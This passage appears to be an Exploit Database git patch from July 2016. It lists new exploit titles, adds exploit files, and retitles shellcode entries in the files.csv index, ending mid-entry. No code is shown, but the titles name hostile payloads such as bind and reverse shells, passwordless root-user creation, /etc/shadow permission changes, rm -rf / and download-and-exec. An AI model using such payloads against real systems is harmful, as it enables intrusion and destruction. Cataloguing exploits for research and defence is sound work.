From d06dff59f9f43c869040c35eaaf3d43a0a9d1364 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 26 Jul 2016 05:04:05 +0000 Subject: [PATCH] DB: 2016-07-26 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 16 new exploits Ubuntu Breezy 5.10 - Installer Password Disclosure Ubuntu 5.10 - Installer Password Disclosure BSD/x86 - setuid/portbind (TCP 31337) shellcode (94 bytes) BSD/x86 - setuid/portbind 31337/TCP shellcode (94 bytes) Linux/x86 - shellcode that forks a HTTP Server on port tcp/8800 (166 bytes) Linux/x86 - listens for shellcode on tcp/5555 and jumps to it (83 bytes) Linux/x86 - Forks a HTTP Server on port 8800/TCP shellcode (166 bytes) Linux/x86 - Listens for shellcode on 5555/TCP and jumps to it (83 bytes) Linux/x86 - Shellcode Polymorphic chmod(_/etc/shadow__666) (54 bytes) Linux/x86 - Polymorphic chmod(_/etc/shadow__666) Shellcode (54 bytes) Linux/x86 - Add root user _r00t_ with no password to /etc/passwd shellcode (69 bytes) Linux/x86 - Add root user 'r00t' with no password to /etc/passwd shellcode (69 bytes) Linux/x86 - SET_PORT() portbind 31337 tcp shellcode (100 bytes) Linux/x86 - SET_PORT() portbind 31337/TCP shellcode (100 bytes) Linux/x86 - Add User _xtz_ without Password to /etc/passwd shellcode (59 bytes) Linux/x86 - Add User 'xtz' without Password to /etc/passwd shellcode (59 bytes) Linux/x86 - Bind /bin/sh to 31337/tcp shellcode (80 bytes) Linux/x86 - Bind /bin/sh to 31337/tcp + fork() shellcode (98 bytes) Linux/x86 - Bind /bin/sh to 31337/TCP shellcode (80 bytes) Linux/x86 - Bind /bin/sh to 31337/TCP + fork() shellcode (98 bytes) Linux/x86 - connect-back shellcode 127.0.0.1:31337/tcp (74 bytes) Linux/x86 - Connect-back shellcode 127.0.0.1:31337/TCP (74 bytes) Linux/x86 - Add user _t00r_ encrypt shellcode (116 bytes) Linux/x86 - Add user 't00r' encrypt shellcode (116 bytes) Linux/x86 - Add user _t00r_ shellcode (82 bytes) Linux/x86 - Add user 't00r' shellcode (82 bytes) Linux/x86 - Add user _z_ shellcode (70 bytes) Linux/x86 - Add User 'z' shellcode (70 bytes) Solaris/x86 - portbind/tcp shellcode (Generator) Solaris/x86 - portbind/TCP shellcode (Generator) Linux/x86 - append _/etc/passwd_ & exit() shellcode (107 bytes) Linux/x86 - append '/etc/passwd' & exit() shellcode (107 bytes) Linux/x86 - sends _Phuck3d!_ to all terminals shellcode (60 bytes) Linux/x86 - sends 'Phuck3d!' to all terminals shellcode (60 bytes) Linux/x86 - change mode 0777 of _/etc/shadow_ with sys_chmod syscall shellcode (39 bytes) Linux/x86 - change mode 0777 of '/etc/shadow' with sys_chmod syscall shellcode (39 bytes) Linux/x86 - change mode 0777 of _/etc/passwd_ with sys_chmod syscall shellcode (39 bytes) Linux/x86 - change mode 0777 of '/etc/passwd' with sys_chmod syscall shellcode (39 bytes) Linux/ARM - Add root user _shell-storm_ with password _toor_ shellcode (151 bytes) Linux/ARM - Add root user 'shell-storm' with password 'toor' shellcode (151 bytes) OS-X/Intel - reverse_tcp shell x86_64 shellcode (131 bytes) OS-X/Intel (x86_64) - reverse_tcp shell shellcode (131 bytes) Linux/SuperH (sh4) - Add root user _shell-storm_ with password _toor_ shellcode (143 bytes) Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' shellcode (143 bytes) Linux/MIPS - Add user(UID 0) _rOOt_ with password _pwn3d_ shellcode (164 bytes) Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' shellcode (164 bytes) Linux/x86-64 - Bind TCP 4444 Port Shellcode (81 bytes / 96 bytes with password) Linux/x86-64 - Bind 4444/TCP Port Shellcode (81 bytes / 96 bytes with password) Linux/x86 - TCP Bind Shell 33333 Port Shellcode (96 bytes) Linux/x86 - Bind Shell 33333/TCP Port Shellcode (96 bytes) OS-X/x86-64 - tcp 4444 port bind Nullfree shellcode (144 bytes) OS-X/x86-64 - 4444/TPC port bind Nullfree shellcode (144 bytes) Linux/x86-64 - Bind TCP 4444 Port Shellcode (103 bytes) Linux/x86-64 - TCP 4444 port Bindshell with Password Prompt shellcode (162 bytes) Linux/x86-64 - Bind 4444/TCP Port Shellcode (103 bytes) Linux/x86-64 - Bindshell 4444/TCP with Password Prompt shellcode (162 bytes) Linux/x86-64 - Bind TCP Port 1472 shellcode (IPv6) (199 bytes) Linux/x86-64 - Bind 1472/TCP shellcode (IPv6) (199 bytes) Linux/x86 - TCP Bind Shell Port 4444 shellcode (656 bytes) Linux/x86 - Bind Shell Port 4444/TCP shellcode (656 bytes) Linux/x86 - TCP Bind Shell Port 4444 shellcode (98 bytes) Linux/x86 - Bind Shell Port 4444/TCP shellcode (98 bytes) Rapid7 AppSpider 6.12 - Local Privilege Escalation Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit) Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit) MediaCoder 0.8.43.5852 - .m3u SEH Exploit Drupal CODER Module 2.5 - Remote Command Execution (Metasploit) CodoForum 3.2.1 - SQL Injection CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter+ASLR bypass) GRR Système de Gestion et de Réservations de Ressources 3.0.0-RC1 - Arbitrary File Upload PHP gettext (gettext.php) 1.0.12 - Unauthenticated Code Execution PHP 7.0.8_ 5.6.23 and 5.5.37 - bzread() Out-of-Bounds Write Ubee EVW3226 Modem/Router 1.0.20 - Multiple Vulnerabilities Technicolor TC7200 Modem/Router STD6.02.11 - Multiple Vulnerabilities Hitron CGNV4 Modem/Router 4.3.9.9-SIP-UPC - Multiple Vulnerabilities Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities --- files.csv | 78 ++++--- platforms/cgi/webapps/40156.py | 305 +++++++++++++++++++++++++ platforms/cgi/webapps/40157.py | 130 +++++++++++ platforms/hardware/webapps/40158.txt | 63 ++++++ platforms/hardware/webapps/40159.txt | 75 +++++++ platforms/hardware/webapps/40160.py | 268 ++++++++++++++++++++++ platforms/java/webapps/40161.txt | 263 ++++++++++++++++++++++ platforms/linux/remote/40146.rb | 238 ++++++++++++++++++++ platforms/linux/remote/40147.rb | 169 ++++++++++++++ platforms/php/dos/40155.txt | 324 +++++++++++++++++++++++++++ platforms/php/webapps/40149.rb | 107 +++++++++ platforms/php/webapps/40150.txt | 35 +++ platforms/php/webapps/40153.txt | 183 +++++++++++++++ platforms/php/webapps/40154.txt | 247 ++++++++++++++++++++ platforms/windows/local/40145.txt | 90 ++++++++ platforms/windows/local/40148.py | 58 +++++ platforms/windows/local/40151.py | 53 +++++ 17 files changed, 2655 insertions(+), 31 deletions(-) create mode 100755 platforms/cgi/webapps/40156.py create mode 100755 platforms/cgi/webapps/40157.py create mode 100755 platforms/hardware/webapps/40158.txt create mode 100755 platforms/hardware/webapps/40159.txt create mode 100755 platforms/hardware/webapps/40160.py create mode 100755 platforms/java/webapps/40161.txt create mode 100755 platforms/linux/remote/40146.rb create mode 100755 platforms/linux/remote/40147.rb create mode 100755 platforms/php/dos/40155.txt create mode 100755 platforms/php/webapps/40149.rb create mode 100755 platforms/php/webapps/40150.txt create mode 100755 platforms/php/webapps/40153.txt create mode 100755 platforms/php/webapps/40154.txt create mode 100755 platforms/windows/local/40145.txt create mode 100755 platforms/windows/local/40148.py create mode 100755 platforms/windows/local/40151.py diff --git a/files.csv b/files.csv index 075afaaa0..b7a8b4ddf 100755 --- a/files.csv +++ b/files.csv @@ -1319,7 +1319,7 @@ id,file,description,date,author,platform,type,port 1576,platforms/php/webapps/1576.txt,"Jupiter CMS <= 1.1.5 - Multiple XSS Attack Vectors",2006-03-11,Nomenumbra,php,webapps,0 1577,platforms/irix/local/1577.sh,"SGI IRIX <= 6.5.28 - (runpriv) Design Error",2005-10-10,anonymous,irix,local,0 1578,platforms/linux/remote/1578.c,"PeerCast <= 0.1216 - (nextCGIarg) Remote Buffer Overflow Exploit (2)",2006-03-12,darkeagle,linux,remote,7144 -1579,platforms/linux/local/1579.pl,"Ubuntu Breezy 5.10 - Installer Password Disclosure",2006-03-12,"Kristian Hermansen",linux,local,0 +1579,platforms/linux/local/1579.pl,"Ubuntu 5.10 - Installer Password Disclosure",2006-03-12,"Kristian Hermansen",linux,local,0 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog <= 0.4.7.1 - Remote Command Execution Exploit",2006-03-13,rgod,php,webapps,0 1582,platforms/linux/remote/1582.c,"crossfire-server <= 1.9.0 - SetUp() Remote Buffer Overflow Exploit",2006-03-13,landser,linux,remote,13327 1583,platforms/osx/remote/1583.pl,"Apple Mac OS X 10.4.5 Mail.app (Real Name) Buffer Overflow Exploit",2006-03-13,"Kevin Finisterre",osx,remote,25 @@ -11718,7 +11718,7 @@ id,file,description,date,author,platform,type,port 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 13243,platforms/bsd_ppc/shellcode/13243.c,"BSD/PPC - execve /bin/sh shellcode (128 bytes)",2004-09-26,Palante,bsd_ppc,shellcode,0 13244,platforms/bsd_x86/shellcode/13244.c,"BSD/x86 - setuid(0) then execve /bin/sh shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0 -13245,platforms/bsd_x86/shellcode/13245.c,"BSD/x86 - setuid/portbind (TCP 31337) shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0 +13245,platforms/bsd_x86/shellcode/13245.c,"BSD/x86 - setuid/portbind 31337/TCP shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0 13246,platforms/bsd_x86/shellcode/13246.c,"BSD/x86 - execve /bin/sh multiplatform shellcode (27 bytes)",2004-09-26,n0gada,bsd_x86,shellcode,0 13247,platforms/bsd_x86/shellcode/13247.c,"BSD/x86 - execve /bin/sh setuid (0) shellcode (29 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - portbind port 31337 shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0 @@ -11784,14 +11784,14 @@ id,file,description,date,author,platform,type,port 13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - connect back (192.168.100.1:2313) shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0 13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - portbind port 8975 shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0 13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-modifying shellcode for IDS evasion (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 -13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - shellcode that forks a HTTP Server on port tcp/8800 (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 -13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - listens for shellcode on tcp/5555 and jumps to it (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0 +13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on port 8800/TCP shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 +13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens for shellcode on 5555/TCP and jumps to it (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0 13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Polymorphic shellcode disable Network Card (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0 13311,platforms/lin_x86/shellcode/13311.c,"Linux/x86 - killall5 polymorphic shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 13312,platforms/lin_x86/shellcode/13312.c,"Linux/x86 - /bin/sh polymorphic shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 13313,platforms/lin_x86/shellcode/13313.c,"Linux/x86 - 4444 Port Binding Shellcode (xor-encoded) (152 bytes)",2009-07-10,Rick,lin_x86,shellcode,0 13314,platforms/lin_x86/shellcode/13314.c,"Linux/x86 - reboot() polymorphic shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",lin_x86,shellcode,0 -13315,platforms/lin_x86/shellcode/13315.c,"Linux/x86 - Shellcode Polymorphic chmod(_/etc/shadow__666) (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0 +13315,platforms/lin_x86/shellcode/13315.c,"Linux/x86 - Polymorphic chmod(_/etc/shadow__666) Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0 13316,platforms/lin_x86/shellcode/13316.c,"Linux/x86 - setreuid(geteuid()_geteuid())_execve(_/bin/sh__0_0) shellcode (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0 13317,platforms/lin_x86/shellcode/13317.s,"Linux/x86 - bindport 8000 & execve iptables -F shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - bindport 8000 & add user with root access shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 @@ -11825,7 +11825,7 @@ id,file,description,date,author,platform,type,port 13346,platforms/lin_x86/shellcode/13346.s,"Linux/x86 - execve read shellcode (92 bytes)",2006-11-20,0ut0fbound,lin_x86,shellcode,0 13347,platforms/lin_x86/shellcode/13347.c,"Linux/x86 - /sbin/ipchains -F shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13348,platforms/lin_x86/shellcode/13348.c,"Linux/x86 - set system time to 0 and exit shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add root user _r00t_ with no password to /etc/passwd shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add root user 'r00t' with no password to /etc/passwd shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13350,platforms/lin_x86/shellcode/13350.c,"Linux/x86 - chmod 0666 /etc/shadow shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13351,platforms/lin_x86/shellcode/13351.c,"Linux/x86 - forkbomb shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13352,platforms/lin_x86/shellcode/13352.c,"Linux/x86 - execve(rm -rf /) shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 @@ -11839,7 +11839,7 @@ id,file,description,date,author,platform,type,port 13360,platforms/lin_x86/shellcode/13360.c,"Linux/x86 - setuid/portbind (Port 31337) shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - portbind (2707) shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0 13362,platforms/lin_x86/shellcode/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,lin_x86,shellcode,0 -13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - SET_PORT() portbind 31337 tcp shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 +13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - SET_PORT() portbind 31337/TCP shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 13364,platforms/lin_x86/shellcode/13364.c,"Linux/x86 - SET_IP() Connectback (192.168.13.22:31337) Shellcode (82 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 13365,platforms/lin_x86/shellcode/13365.c,"Linux/x86 - execve(/bin/sh) shellcode (24 bytes)",2006-05-01,hophet,lin_x86,shellcode,0 13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - xor-encoded Connect Back (127.0.0.1:80) Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0 @@ -11861,15 +11861,15 @@ id,file,description,date,author,platform,type,port 13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh anti-ids shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0 13383,platforms/lin_x86/shellcode/13383.c,"Linux/x86 - execve /bin/sh xored for Intel x86 CPUID shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0 13384,platforms/lin_x86/shellcode/13384.c,"Linux/x86 - execve /bin/sh shellcode (encoded by +1) (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0 -13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add User _xtz_ without Password to /etc/passwd shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add User 'xtz' without Password to /etc/passwd shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13386,platforms/lin_x86/shellcode/13386.c,"Linux/x86 - anti-debug trick (INT 3h trap) + execve /bin/sh shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind /bin/sh to 31337/tcp shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind /bin/sh to 31337/tcp + fork() shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind /bin/sh to 31337/TCP shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind /bin/sh to 31337/TCP + fork() shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 - 24/7 open cd-rom loop (follows /dev/cdrom symlink) shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + exit() shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - connect-back shellcode 127.0.0.1:31337/tcp (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Connect-back shellcode 127.0.0.1:31337/TCP (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13394,platforms/lin_x86/shellcode/13394.c,"Linux/x86 - normal exit with random (so to speak) return value shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13395,platforms/lin_x86/shellcode/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - quick (yet conditional_ eax != 0 and edx == 0) exit shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0 @@ -11904,7 +11904,7 @@ id,file,description,date,author,platform,type,port 13425,platforms/lin_x86/shellcode/13425.c,"Linux/x86 - execve /bin/sh IA32 0xff-less shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0 13426,platforms/lin_x86/shellcode/13426.c,"Linux/x86 - symlink /bin/sh xoring shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - portbind port 5074 toupper shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0 -13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add user _t00r_ encrypt shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 +13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add user 't00r' encrypt shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 shadow ENCRYPT shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - kill snort shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0 @@ -11926,7 +11926,7 @@ id,file,description,date,author,platform,type,port 13447,platforms/lin_x86/shellcode/13447.c,"Linux/x86 - execve /bin/sh setreuid(12_12) shellcode (50 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 13448,platforms/lin_x86/shellcode/13448.c,"Linux/x86 - portbind port 5074 shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13449,platforms/lin_x86/shellcode/13449.c,"Linux/x86 - portbind port 5074 + fork() shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add user _t00r_ shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add user 't00r' shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13451,platforms/lin_x86/shellcode/13451.c,"Linux/x86 - Add user shellcode (104 bytes)",2004-09-12,"Matt Conover",lin_x86,shellcode,0 13452,platforms/lin_x86/shellcode/13452.c,"Linux/x86 - break chroot shellcode (34 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 13453,platforms/lin_x86/shellcode/13453.c,"Linux/x86 - break chroot shellcode (46 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 @@ -11937,7 +11937,7 @@ id,file,description,date,author,platform,type,port 13458,platforms/lin_x86/shellcode/13458.c,"Linux/x86 - execve of /bin/sh after setreuid(0_0) shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0 13459,platforms/lin_x86/shellcode/13459.c,"Linux/x86 - chroot()/execve() code shellcode (80 bytes)",2001-01-13,preedator,lin_x86,shellcode,0 13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh toupper() evasion shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0 -13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add user _z_ shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 +13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add User 'z' shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - break chroot setuid(0) + /bin/sh shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - bindshell port 4444 shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0 13464,platforms/lin_x86-64/shellcode/13464.s,"Linux/x86-64 - execve(/bin/sh) shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode,0 @@ -11974,7 +11974,7 @@ id,file,description,date,author,platform,type,port 13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - portbind port 6789 shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - connect-bac shellcode k (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - portbinding shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0 -13498,platforms/solaris_x86/shellcode/13498.php,"Solaris/x86 - portbind/tcp shellcode (Generator)",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0 +13498,platforms/solaris_x86/shellcode/13498.php,"Solaris/x86 - portbind/TCP shellcode (Generator)",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0 13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null Free shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0 13500,platforms/solaris_x86/shellcode/13500.c,"Solaris/x86 - setuid(0)_ execve(/bin/cat_ /etc/shadow)_ exit(0) shellcode (59 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0 13501,platforms/solaris_x86/shellcode/13501.txt,"Solaris/x86 - execve /bin/sh toupper evasion shellcode (84 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0 @@ -12030,7 +12030,7 @@ id,file,description,date,author,platform,type,port 13576,platforms/lin_x86/shellcode/13576.asm,"Linux/x86 - chmod 666 /etc/shadow shellcode (27 bytes)",2010-01-16,root@thegibson,lin_x86,shellcode,0 13577,platforms/lin_x86/shellcode/13577.txt,"Linux/x86 - break chroot shellcode (79 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0 13578,platforms/lin_x86/shellcode/13578.txt,"Linux/x86 - fork bomb shellcode (6 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0 -13579,platforms/lin_x86/shellcode/13579.c,"Linux/x86 - append _/etc/passwd_ & exit() shellcode (107 bytes)",2009-12-31,sandman,lin_x86,shellcode,0 +13579,platforms/lin_x86/shellcode/13579.c,"Linux/x86 - append '/etc/passwd' & exit() shellcode (107 bytes)",2009-12-31,sandman,lin_x86,shellcode,0 13581,platforms/windows/shellcode/13581.txt,"Windows XP Pro SP2 English - _Message-Box_ Null Free Shellcode (16 bytes)",2010-01-03,Aodrulez,windows,shellcode,0 13582,platforms/windows/shellcode/13582.txt,"Windows XP Pro SP2 English - _Wordpad_ Null Free Shellcode (12 bytes)",2010-01-03,Aodrulez,windows,shellcode,0 13586,platforms/lin_x86/shellcode/13586.txt,"Linux/x86 - eject /dev/cdrom shellcode (42 bytes)",2010-01-08,root@thegibson,lin_x86,shellcode,0 @@ -12069,7 +12069,7 @@ id,file,description,date,author,platform,type,port 13682,platforms/lin_x86/shellcode/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) & execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,lin_x86,shellcode,0 13688,platforms/lin_x86-64/shellcode/13688.c,"Linux/x86-64 - reboot(POWER_OFF) shellcode (19 bytes)",2010-04-25,zbt,lin_x86-64,shellcode,0 13691,platforms/lin_x86-64/shellcode/13691.c,"Linux/x86-64 - execve(_/bin/sh_); shellcode (30 bytes)",2010-04-25,zbt,lin_x86-64,shellcode,0 -13692,platforms/lin_x86/shellcode/13692.c,"Linux/x86 - sends _Phuck3d!_ to all terminals shellcode (60 bytes)",2010-04-25,condis,lin_x86,shellcode,0 +13692,platforms/lin_x86/shellcode/13692.c,"Linux/x86 - sends 'Phuck3d!' to all terminals shellcode (60 bytes)",2010-04-25,condis,lin_x86,shellcode,0 13697,platforms/lin_x86/shellcode/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",lin_x86,shellcode,0 13698,platforms/lin_x86/shellcode/13698.c,"Linux/x86 - polymorphic execve(_/bin/bash___-p__NULL) shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",lin_x86,shellcode,0 13699,platforms/win_x86/shellcode/13699.txt,"Windows XP SP2 FR - Download and Exec Shellcode",2010-05-10,Crack_MaN,win_x86,shellcode,0 @@ -12084,9 +12084,9 @@ id,file,description,date,author,platform,type,port 13716,platforms/lin_x86/shellcode/13716.c,"Linux/x86 - alphanumeric Bomb FORK Shellcode (117 bytes)",2010-05-27,agix,lin_x86,shellcode,0 13719,platforms/win_x86-64/shellcode/13719.txt,"Windows 7 Pro SP1 64 FR - (Beep) Shellcode (39 bytes)",2010-05-28,agix,win_x86-64,shellcode,0 13722,platforms/lin_x86/shellcode/13722.c,"Linux/x86 - Polymorphic setuid(0) + chmod(_/etc/shadow__ 0666) Shellcode (61 bytes)",2010-05-31,antrhacks,lin_x86,shellcode,0 -13723,platforms/lin_x86/shellcode/13723.c,"Linux/x86 - change mode 0777 of _/etc/shadow_ with sys_chmod syscall shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 +13723,platforms/lin_x86/shellcode/13723.c,"Linux/x86 - change mode 0777 of '/etc/shadow' with sys_chmod syscall shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 13724,platforms/lin_x86/shellcode/13724.c,"Linux/x86 - kill all running process shellcode (11 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 -13725,platforms/lin_x86/shellcode/13725.txt,"Linux/x86 - change mode 0777 of _/etc/passwd_ with sys_chmod syscall shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 +13725,platforms/lin_x86/shellcode/13725.txt,"Linux/x86 - change mode 0777 of 